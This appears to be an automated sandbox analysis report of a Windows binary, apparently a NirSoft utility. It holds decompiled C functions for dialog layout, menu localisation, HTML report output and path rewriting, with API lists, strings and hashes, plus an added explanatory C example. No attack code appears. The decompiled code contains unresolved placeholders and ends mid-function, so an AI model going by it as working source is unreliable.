                                                                                                                                                				void* __esi;
                                                                                                                                                				void* _t3;
                                                                                                                                                				int _t6;
                                                                                                                                                
                                                                                                                                                				_t3 = E004057D1(_a4);
                                                                                                                                                				if(_t3 != 0) {
                                                                                                                                                					wcscpy(0x412c38, _a4);
                                                                                                                                                					wcscpy(0x412e48, L"general");
                                                                                                                                                					_t6 = GetPrivateProfileIntW(0x412e48, L"rtl", 0, 0x412c38);
                                                                                                                                                					asm("sbb eax, eax");
                                                                                                                                                					 *0x412ecc =  ~(_t6 - 1) + 1;
                                                                                                                                                					E00406D4D(0x412ed0, L"charset", 0x3f);
                                                                                                                                                					E00406D4D(0x412f50, L"TranslatorName", 0x3f);
                                                                                                                                                					return E00406D4D(0x412fd0, L"TranslatorURL", 0xff);
                                                                                                                                                				}
                                                                                                                                                				return _t3;
                                                                                                                                                			}

APIs
  • Part of subcall function 004057D1: GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5
• wcscpy.MSVCRT ref: 004071EB
• wcscpy.MSVCRT ref: 004071FB
• GetPrivateProfileIntW.KERNEL32 ref: 0040720C
  • Part of subcall function 00406D4D: GetPrivateProfileStringW.KERNEL32 ref: 00406D69
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: PrivateProfilewcscpy$AttributesFileString
• String ID: 8,A$H.A$P/A$TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 3176057301-819253090
• Opcode ID: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
• Instruction ID: f115d196d4af7e8601c57319c09dc176dc9760a1553b0771dc73547d8c0c0b20
• Opcode Fuzzy Hash: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
• Instruction Fuzzy Hash: 96F0CD32FC036172C62176225E06F6B25148F91B15F15447BBC08FA5C2D6FC08669A9D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040A5AB(void* __esi) {
    struct HDWP__* _v8;
    signed int _v12;
    int _v16;
    int _v20;
    intOrPtr _v24;
    struct tagRECT _v40;
    intOrPtr _v44;
    struct tagPOINT _v56;
    void* _t53;
    int _t99;
    void* _t101;

    _t101 = __esi;
    if( *((intOrPtr*)(__esi + 0x244)) != 0) {
        GetClientRect( *(__esi + 0x208),  &_v40);
        GetWindowRect( *(__esi + 0x214),  &_v56);
        _v20 = _v44 - _v56.y + 1;
        GetWindowRect( *(__esi + 0x218),  &_v56);
        _v16 = _v40.right - _v40.left;
        _t99 = _v44 - _v56.y + 1;
        _v24 = _v40.bottom - _v40.top;
        _v12 = 0xdc;
        if( *(__esi + 0x6d4) != 0) {
            GetWindowRect(GetDlgItem( *(__esi + 0x6d4), 0x40d),  &_v56);
            MapWindowPoints(0,  *(__esi + 0x6d4),  &_v56, 2);
            _v12 = _v44 + 6;
        }
        if( *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x698)) + 0x224)) == 0) {
            _v12 = _v12 & 0x00000000;
        }
        _v8 = BeginDeferWindowPos(4);
        DeferWindowPos(_v8,  *(_t101 + 0x218), 0, 0, 0, _v16, _t99, 4);
        DeferWindowPos(_v8,  *(_t101 + 0x214), 0, 0, _v40.bottom - _v20 + 1, _v16, _v20, 6);
        DeferWindowPos(_v8,  *( *((intOrPtr*)(_t101 + 0x69c)) + 0x2ac), 0, 0, _v12 + _t99, _v16, _v24 - _v12 - _t99 - _v20, 4);
        DeferWindowPos(_v8,  *(_t101 + 0x6d4), 0, 0, _t99, _v16, _v12, 4);
        return EndDeferWindowPos(_v8);
    }
    return _t53;
}

APIs
• GetClientRect.USER32 ref: 0040A5CA
• GetWindowRect.USER32 ref: 0040A5E0
• GetWindowRect.USER32 ref: 0040A5F6
• GetDlgItem.USER32 ref: 0040A630
• GetWindowRect.USER32 ref: 0040A637
• MapWindowPoints.USER32 ref: 0040A647
• BeginDeferWindowPos.USER32 ref: 0040A66B
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A68E
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A6AD
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 0040A6D8
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 0040A6F0
• EndDeferWindowPos.USER32(?), ref: 0040A6F5
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: Window$Defer$Rect$BeginClientItemPoints
• String ID:
• API String ID: 552707033-0
• Opcode ID: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
• Instruction ID: 1e8564dccfd76f42bf82a6a58439150b57488fc8b3b7f8ee37cc979cf164ca84
• Opcode Fuzzy Hash: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
• Instruction Fuzzy Hash: 1E41B571900209FFDB11DBA8DD89FEEBBB6EB48304F100465E655B61A0C7716A549B14
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 96%
E00403899(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    struct HDWP__* _v8;
    void* __esi;
    struct HDWP__* _t27;
    intOrPtr* _t51;
    RECT* _t56;

    _push(__ecx);
    _t51 = __ecx;
    if(_a4 != 0x18) {
        L4:
        if(_a4 == 2) {
            KillTimer( *(_t51 + 0x10), 0x41);
        }
        if(_a4 != 0x113) {
            L11:
            if(_a4 == 5) {
                _t27 = BeginDeferWindowPos(5);
                _t56 = _t51 + 0x40;
                _v8 = _t27;
                E004017E9(_t56, _t27, 0x40b, 0, 0, 1);
                E004017E9(_t56, _v8, 0x40c, 1, 0, 0);
                E004017E9(_t56, _v8, 0x40e, 1, 0, 0);
                E004017E9(_t56, _v8, 0x40f, 1, 0, 0);
                E004017E9(_t56, _v8, 0x40d, 0, 0, 1);
                EndDeferWindowPos(_v8);
                InvalidateRect( *(_t56 + 0x10), _t56, 1);
            }
            goto L13;
        } else {
            if(_a8 != 0x41 ||  *((intOrPtr*)(_t51 + 0x78)) == 0 || GetTickCount() -  *((intOrPtr*)(_t51 + 0x7c)) <= 0x1f4) {
                L13:
                return E004015CE(_t51, _a4, _a8, _a12);
            } else {
                 *((intOrPtr*)(_t51 + 0x78)) = 0;
                 *((intOrPtr*)( *_t51 + 4))(0);
                SendMessageW(GetParent( *(_t51 + 0x10)), 0x469, 0, 0);
                goto L11;
            }
        }
    }
    if(_a8 == 0) {
        KillTimer( *(__ecx + 0x10), 0x41);
        goto L4;
    }
    SetTimer( *(__ecx + 0x10), 0x41, 0x64, 0);
    goto L13;
}

                                                                                                                                                0x0040389c
                                                                                                                                                0x004038ac
                                                                                                                                                0x004038ae
                                                                                                                                                0x004038cf
                                                                                                                                                0x004038d3
                                                                                                                                                0x004038da
                                                                                                                                                0x004038da
                                                                                                                                                0x004038e3
                                                                                                                                                0x0040392e
                                                                                                                                                0x00403932
                                                                                                                                                0x00403936
                                                                                                                                                0x00403945
                                                                                                                                                0x00403949
                                                                                                                                                0x0040394c
                                                                                                                                                0x0040395d
                                                                                                                                                0x0040396e
                                                                                                                                                0x0040397f
                                                                                                                                                0x00403990
                                                                                                                                                0x00403998
                                                                                                                                                0x004039a4
                                                                                                                                                0x004039a4
                                                                                                                                                0x00000000
                                                                                                                                                0x004038e5
                                                                                                                                                0x004038e9
                                                                                                                                                0x004039aa
                                                                                                                                                0x004039be
                                                                                                                                                0x0040390c
                                                                                                                                                0x00403911
                                                                                                                                                0x00403914
                                                                                                                                                0x00403928
                                                                                                                                                0x00000000
                                                                                                                                                0x00403928
                                                                                                                                                0x004038e9
                                                                                                                                                0x004038e3
                                                                                                                                                0x004038b3
                                                                                                                                                0x004038cd
                                                                                                                                                0x00000000
                                                                                                                                                0x004038cd
                                                                                                                                                0x004038bd
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004038BD
                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004038CD
                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004038DA
                                                                                                                                                • GetTickCount.KERNEL32 ref: 004038F8
                                                                                                                                                • GetParent.USER32(?), ref: 00403921
                                                                                                                                                • SendMessageW.USER32(00000000), ref: 00403928
                                                                                                                                                • BeginDeferWindowPos.USER32 ref: 00403936
                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 00403998
                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004039A4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                • String ID: A
                                                                                                                                                • API String ID: 2892645895-3554254475
                                                                                                                                                • Opcode ID: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
                                                                                                                                                • Instruction ID: 0871a1714dd068d8f738543c02bb6dd68063c1354b3792716d758cdabfe2902c
                                                                                                                                                • Opcode Fuzzy Hash: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
                                                                                                                                                • Instruction Fuzzy Hash: 2B315DB1650608BFEB205F60CC86E9ABAADFB04745F00803AF305754E0C7B69E90DA98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 56%
                                                                                                                                                			E0040D7CE(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
                                                                                                                                                				void _v514;
                                                                                                                                                				char _v516;
                                                                                                                                                				void _v1026;
                                                                                                                                                				char _v1028;
                                                                                                                                                				void _v1538;
                                                                                                                                                				char _v1540;
                                                                                                                                                				void* _t39;
                                                                                                                                                				intOrPtr* _t50;
                                                                                                                                                				void* _t61;
                                                                                                                                                
                                                                                                                                                				_t50 = __ecx;
                                                                                                                                                				_push(0x1fe);
                                                                                                                                                				_push(0);
                                                                                                                                                				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                                                                                					_v1540 = 0;
                                                                                                                                                					memset( &_v1538, ??, ??);
                                                                                                                                                					_v1028 = 0;
                                                                                                                                                					memset( &_v1026, 0, 0x1fe);
                                                                                                                                                					_v516 = 0;
                                                                                                                                                					memset( &_v514, 0, 0x1fe);
                                                                                                                                                					L0040DFD6();
                                                                                                                                                					 *((long long*)(_t61 + 0x2c)) = _a16;
                                                                                                                                                					L0040DFD6();
                                                                                                                                                					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
                                                                                                                                                					if (_t39 != 0) goto L3;
                                                                                                                                                					return _t39;
                                                                                                                                                				}
                                                                                                                                                				_v516 = 0;
                                                                                                                                                				memset( &_v514, ??, ??);
                                                                                                                                                				_v1028 = 0;
                                                                                                                                                				memset( &_v1026, 0, 0x1fe);
                                                                                                                                                				L0040DFD6();
                                                                                                                                                				 *((long long*)(_t61 + 0x20)) =  *_a12;
                                                                                                                                                				L0040DFD6();
                                                                                                                                                				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40f454, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
                                                                                                                                                			}

                                                                                                                                                0x0040d7e1
                                                                                                                                                0x0040d7e6
                                                                                                                                                0x0040d7e7
                                                                                                                                                0x0040d7e8
                                                                                                                                                0x0040d875
                                                                                                                                                0x0040d87c
                                                                                                                                                0x0040d88a
                                                                                                                                                0x0040d891
                                                                                                                                                0x0040d89f
                                                                                                                                                0x0040d8a6
                                                                                                                                                0x0040d8c0
                                                                                                                                                0x0040d8cb
                                                                                                                                                0x0040d8dd
                                                                                                                                                0x0040d8fb
                                                                                                                                                0x0040d900
                                                                                                                                                0x00000000
                                                                                                                                                0x0040d900
                                                                                                                                                0x0040d7f5
                                                                                                                                                0x0040d7fc
                                                                                                                                                0x0040d80a
                                                                                                                                                0x0040d811
                                                                                                                                                0x0040d82b
                                                                                                                                                0x0040d838
                                                                                                                                                0x0040d84a
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                • String ID: %%0.%df
                                                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                                                • Opcode ID: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
                                                                                                                                                • Instruction ID: bd80c20c5eef5304b465cefa7c525b6dc43605deb3d47911a7a30c53393811c5
                                                                                                                                                • Opcode Fuzzy Hash: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
                                                                                                                                                • Instruction Fuzzy Hash: 9F315E71900129AADB20DF95CC85FEB777CFF48304F0044FAB50AB6152E7749A588B69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%
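The routine E0040D7CE above builds its numeric format string at run time: the constant template L"%%0.%df" is first expanded by _snwprintf (the API ID for this function lists memset and _snwprintf) into a concrete format such as "%0.2f", and that generated string then formats the double taken from _a16 or *_a12. The C program below is an added example, not code from the sample or from the report; it reproduces the two-stage expansion with the narrow snprintf so that it compiles anywhere, and the function names, the 255-byte output buffer and the clamp on the precision argument are my own choices. The sample passes its precision argument (_a8) into the template unchecked; the clamp is the check a practitioner would want, because a negative or oversized value turns the generated format into garbage that the compiler can no longer catch.

```c
#include <stdio.h>
#include <string.h>

/* Upper bound on requested decimal places. The decompiled routine feeds
   the caller's precision (_a8) straight into the template with no check;
   this clamp is an added safeguard, not something the sample does. */
#define MAX_DECIMALS 20

/* Stage 1: expand the constant template "%%0.%df" into a concrete format
   such as "%0.2f". The doubled "%%" survives as a single '%', so the only
   value that enters the generated format string is the integer precision. */
static int build_precision_format(char *fmt, size_t fmt_len, int decimals)
{
    if (decimals < 0)
        decimals = 0;
    if (decimals > MAX_DECIMALS)
        decimals = MAX_DECIMALS;
    return snprintf(fmt, fmt_len, "%%0.%df", decimals);
}

/* Stage 2: render the double with the generated format. The sample does
   the same with _snwprintf into wide buffers sized 0xff characters; 255 is
   kept here as the output buffer size to mirror that. */
static int format_double(char *out, size_t out_len, int decimals, double value)
{
    char fmt[16];
    if (build_precision_format(fmt, sizeof fmt, decimals) < 0)
        return -1;
    /* fmt is not a compile-time literal, so the compiler cannot verify it;
       the clamp in stage 1 is what keeps it well-formed. */
    return snprintf(out, out_len, fmt, value);
}

/* Returns 1 when formatting 'value' with 'decimals' places yields exactly
   'expected', 0 otherwise. */
int formatted_equals(int decimals, double value, const char *expected)
{
    char out[255];
    if (format_double(out, sizeof out, decimals, value) < 0)
        return 0;
    return strcmp(out, expected) == 0;
}

/* Returns the generated stage-1 format string for inspection, e.g. "%0.3f". */
const char *precision_format(int decimals)
{
    static char fmt[16];
    build_precision_format(fmt, sizeof fmt, decimals);
    return fmt;
}

int main(void)
{
    /* Constructed sample input: one value rendered at several precisions. */
    char out[255];
    int d;
    for (d = 0; d <= 4; d++) {
        format_double(out, sizeof out, d, 3.14159265);
        printf("decimals=%d format=%-6s -> %s\n", d, precision_format(d), out);
    }
    return 0;
}
```

Reading the decompiled call against this: the two `_push(0x1fe); _push(0);` at the top of E0040D7CE are the arguments the decompiler could not attach to the first `memset( ..., ??, ??)`, and 0x1fe bytes is 255 wide characters, the same 0xff that is passed as the length of each buffer to the formatting call.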

                                                                                                                                                C-Code - Quality: 51%
                                                                                                                                                			E00407047(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
                                                                                                                                                				void _v8202;
                                                                                                                                                				short _v8204;
                                                                                                                                                				void* _t27;
                                                                                                                                                				short _t29;
                                                                                                                                                				short _t40;
                                                                                                                                                				void* _t41;
                                                                                                                                                				struct HMENU__* _t43;
                                                                                                                                                				short _t50;
                                                                                                                                                				void* _t52;
                                                                                                                                                				struct HMENU__* _t59;
                                                                                                                                                
                                                                                                                                                				E0040E340(0x2008, __ecx);
                                                                                                                                                				_t65 = _a8 - 4;
                                                                                                                                                				if(_a8 != 4) {
                                                                                                                                                					__eflags = _a8 - 5;
                                                                                                                                                					if(_a8 == 5) {
                                                                                                                                                						_t50 =  *0x4131d0; // 0x0
                                                                                                                                                						__eflags = _t50;
                                                                                                                                                						if(_t50 == 0) {
                                                                                                                                                							L8:
                                                                                                                                                							_push(_a12);
                                                                                                                                                							_t27 = 5;
                                                                                                                                                							E00406CC6(_t27);
                                                                                                                                                							_t29 = CreateDialogParamW(_a4, _a12, 0, E00407042, 0);
                                                                                                                                                							__eflags = _t29;
                                                                                                                                                							_a8 = _t29;
                                                                                                                                                							if(_t29 == 0) {
                                                                                                                                                								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00407042, 0);
                                                                                                                                                							}
                                                                                                                                                							_v8204 = 0;
                                                                                                                                                							memset( &_v8202, 0, 0x2000);
                                                                                                                                                							GetWindowTextW(_a8,  &_v8204, 0x1000);
                                                                                                                                                							__eflags = _v8204;
                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                								E00406DE5(__eflags, L"caption",  &_v8204, 0);
                                                                                                                                                							}
                                                                                                                                                							EnumChildWindows(_a8, E00406F88, 0);
                                                                                                                                                							DestroyWindow(_a8);
                                                                                                                                                						} else {
                                                                                                                                                							while(1) {
                                                                                                                                                								_t40 =  *_t50;
                                                                                                                                                								__eflags = _t40;
                                                                                                                                                								if(_t40 == 0) {
                                                                                                                                                									goto L8;
                                                                                                                                                								}
                                                                                                                                                								__eflags = _t40 - _a12;
                                                                                                                                                								if(_t40 != _a12) {
                                                                                                                                                									_t50 = _t50 + 4;
                                                                                                                                                									__eflags = _t50;
                                                                                                                                                									continue;
                                                                                                                                                								}
                                                                                                                                                								goto L13;
                                                                                                                                                							}
                                                                                                                                                							goto L8;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				} else {
                                                                                                                                                					_push(_a12);
                                                                                                                                                					_t41 = 4;
                                                                                                                                                					E00406CC6(_t41);
                                                                                                                                                					_pop(_t52);
                                                                                                                                                					_t43 = LoadMenuW(_a4, _a12);
                                                                                                                                                					 *0x412c34 =  *0x412c34 & 0x00000000;
                                                                                                                                                					_t59 = _t43;
                                                                                                                                                					_push(1);
                                                                                                                                                					_push(_t59);
                                                                                                                                                					_push(_a12);
                                                                                                                                                					E00406E97(_t52, _t65);
                                                                                                                                                					DestroyMenu(_t59);
                                                                                                                                                				}
                                                                                                                                                				L13:
                                                                                                                                                				return 1;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • LoadMenuW.USER32 ref: 0040706F
                                                                                                                                                  • Part of subcall function 00406E97: GetMenuItemCount.USER32 ref: 00406EAD
                                                                                                                                                  • Part of subcall function 00406E97: memset.MSVCRT ref: 00406ECC
                                                                                                                                                  • Part of subcall function 00406E97: GetMenuItemInfoW.USER32 ref: 00406F08
                                                                                                                                                  • Part of subcall function 00406E97: wcschr.MSVCRT ref: 00406F20
                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 0040708D
                                                                                                                                                • CreateDialogParamW.USER32 ref: 004070E2
                                                                                                                                                • GetDesktopWindow.USER32 ref: 004070ED
                                                                                                                                                • CreateDialogParamW.USER32 ref: 004070FA
                                                                                                                                                • memset.MSVCRT ref: 00407113
                                                                                                                                                • GetWindowTextW.USER32 ref: 0040712A
                                                                                                                                                • EnumChildWindows.USER32 ref: 00407157
                                                                                                                                                • DestroyWindow.USER32(00000005), ref: 00407160
                                                                                                                                                  • Part of subcall function 00406CC6: _snwprintf.MSVCRT ref: 00406CEB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                • String ID: caption
                                                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                                                • Opcode ID: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
                                                                                                                                                • Instruction ID: 143ff9b161303c46051d95ab40737f9cae21d75e3476d01ba51655d965e5fbc2
                                                                                                                                                • Opcode Fuzzy Hash: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
                                                                                                                                                • Instruction Fuzzy Hash: 1131B472504208BFEF219F60DC85EAB3B69FB00314F10847AF909A6191D7759D64CB56
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 65%
                                                                                                                                                			E00409D04(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                				void _v2050;
                                                                                                                                                				char _v2052;
                                                                                                                                                				void _v4098;
                                                                                                                                                				long _v4100;
                                                                                                                                                				void _v6146;
                                                                                                                                                				char _v6148;
                                                                                                                                                				void* __esi;
                                                                                                                                                				void* _t43;
                                                                                                                                                				intOrPtr* _t49;
                                                                                                                                                				intOrPtr* _t57;
                                                                                                                                                				void* _t58;
                                                                                                                                                				void* _t59;
                                                                                                                                                				intOrPtr _t62;
                                                                                                                                                				intOrPtr _t63;
                                                                                                                                                
                                                                                                                                                				_t49 = __ecx;
                                                                                                                                                				E0040E340(0x1800, __ecx);
                                                                                                                                                				_t57 = _t49;
                                                                                                                                                				E00408857(_t57, _t49, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                                                                                				_v4100 = 0;
                                                                                                                                                				memset( &_v4098, 0, 0x7fe);
                                                                                                                                                				_v2052 = 0;
                                                                                                                                                				memset( &_v2050, 0, 0x7fe);
                                                                                                                                                				_v6148 = 0;
                                                                                                                                                				memset( &_v6146, 0, 0x7fe);
                                                                                                                                                				_t59 = _t58 + 0x24;
                                                                                                                                                				_t62 =  *0x412ed0; // 0x0
                                                                                                                                                				if(_t62 != 0) {
                                                                                                                                                					_push(0x412ed0);
                                                                                                                                                					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
                                                                                                                                                					_push(0x400);
                                                                                                                                                					_push( &_v2052);
                                                                                                                                                					L0040DFD6();
                                                                                                                                                					_t59 = _t59 + 0x10;
                                                                                                                                                				}
                                                                                                                                                				_t63 =  *0x412ecc; // 0x0
                                                                                                                                                				if(_t63 != 0) {
                                                                                                                                                					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
			}
			/* The DOCTYPE / meta-charset / rtl-table strings listed under Strings below are
			   referenced earlier in this same function (xrefs 00409D14..00409DA4), before this tail. */
			E00409130(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
			/* Argument pushes for L0040DFD6, which matches _snwprintf(buf, 0x400, fmt, ...)
			   (API ID memset$_snwprintf$wcscpy). The %s values are strings obtained from the
			   object's virtual methods; the one visible here goes through vtable+0x90 / +0x94,
			   any remaining %s argument was pushed before this excerpt. */
			_push( *((intOrPtr*)( *_t57 + 0x94))( *((intOrPtr*)( *_t57 + 0x90))()));
			_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
			_push(0x400);                                   /* buffer length in wide characters */
			_push( &_v6148);                                /* destination buffer for the HTML heading */
			L0040DFD6();
			_t43 = E00408857(_t57, _t57, _a4,  &_v6148);   /* emit the formatted heading */
			_t64 = _a8 - 5;
			if(_a8 == 5) {
				return E00409336(_t57, _t64, _a4);         /* additional output stage selected by _a8 == 5 */
			}
			return _t43;
		}


APIs
Strings
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00409D14
• <table dir="rtl"><tr><td>, xrefs: 00409DA4
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00409D81
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00409DE6
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: memset$_snwprintf$wcscpy
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
• API String ID: 1283228442-2366825230
• Opcode ID: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
• Instruction ID: a7c5b093c416f5d9ad8a61283befa58304fd8337d6ea87f6454d28f796e895fe
• Opcode Fuzzy Hash: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
• Instruction Fuzzy Hash: 37219172A001186ACB21AB95CC41FEA37BCFF4C345F0440BEF549E3181DB789E948B69
Uniqueness Score: -1.00%

C-Code - Quality: 85%
		/* E0040CAF2: rebuild a Win32 path in __edi from the path in __esi.
		   Three rewrites are visible: a "\systemroot" component is replaced by the
		   directory GetWindowsDirectoryW returns (subcall 004059AA), a bare leading
		   backslash gets the drive prefix of that directory, and a path that already
		   carries a drive colon is copied as-is. */
		E0040CAF2(wchar_t* __edi, wchar_t* __esi) {
			void _v526;          /* rest of a 0x208-byte (MAX_PATH wide chars) scratch buffer */
			long _v528;          /* first 4 bytes of that buffer, i.e. its first two wide chars */
			wchar_t* _t17;
			signed int _t40;
			wchar_t* _t50;

			_t50 = __edi;
			if(__esi[0] != 0x3a) {                             /* 0x3a == L':' */
				_t17 = wcschr( &(__esi[1]), 0x3a);              /* drive colon further into the string? */
				if(_t17 == 0) {
					/* Case-insensitive search for L"\systemroot" (subcall 0040546C: wcslen,
					   wcslen, _memicmp); negative means not found, otherwise the match offset. */
					_t40 = E0040546C(__esi, L"\\systemroot");
					if(_t40 < 0) {
						if( *__esi != 0x5c) {                        /* 0x5c == L'\\' */
							wcscpy(__edi, __esi);                    /* no rewrite needed: copy verbatim */
						} else {
							/* "\foo": prefix with the drive of the Windows directory */
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E004059AA( &_v528);                      /* GetWindowsDirectoryW into the buffer */
							memcpy(__edi,  &_v528, 4);               /* exactly two wide chars, e.g. L"C:" */
							__edi[1] = __edi[1] & 0x00000000;        /* dword store (32-bit mask): terminates
							                                            the output after the drive prefix */
							wcscat(__edi, __esi);
						}
					} else {
						/* "\systemroot\rest" -> "<windir>\rest": 0x16 bytes == 11 wide chars, the
						   length of L"\systemroot", skipped past the match offset _t40 */
						_v528 = 0;
						memset( &_v526, 0, 0x208);
						E004059AA( &_v528);
						wcscpy(__edi,  &_v528);
						wcscat(__edi, __esi + 0x16 + _t40 * 2);
					}
					L11:
					return _t50;
				}
				_push( &(_t17[0]));        /* colon found: copy from the pointer returned by wcschr */
				L4:
